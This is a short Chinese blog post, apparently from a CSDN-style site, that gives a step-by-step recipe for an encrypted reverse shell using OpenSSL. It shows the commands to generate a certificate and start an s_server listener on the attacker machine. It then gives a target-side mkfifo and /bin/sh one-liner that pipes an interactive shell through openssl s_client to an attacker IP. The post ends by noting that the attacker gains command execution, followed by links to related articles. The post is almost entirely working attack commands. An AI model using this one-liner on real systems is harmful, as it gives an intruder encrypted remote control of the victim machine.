使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
千枫s1 小时前
kali arp欺骗
网络安全
每天一把堆栈2 小时前
pctf-pwn(2025)
网络安全·pwn
菩提小狗2 小时前
每日安全情报报告 · 2026-04-10
网络安全·漏洞·cve·安全情报·每日安全
JS_SWKJ2 小时前
网闸核心技术详解:数据“安全渡河”的物理密码
网络安全
网安情报局4 小时前
RSAC 2026深度解析:AI对抗AI成主流,九大安全能力全面升级
人工智能·网络安全
云安全助手5 小时前
OpenClaw安全深度解析:开放生态下的AI智能体风险与防护实战
人工智能·网络安全
乾元5 小时前
《硅基之盾》番外篇一:时间的折叠——AI 时代下的物理隔离与传统工控(ICS/OT)安全
网络·人工智能·安全·网络安全·架构
千枫s5 小时前
kali怎么制作所有长度的爆破字典
网络·网络安全
AI_Claude_code6 小时前
ZLibrary访问困境方案二:DNS-over-HTTPS/TLS配置与隐私保护实践
爬虫·python·网络协议·http·网络安全·https·网络爬虫
pencek6 小时前
HakcMyVM-Nebula
网络安全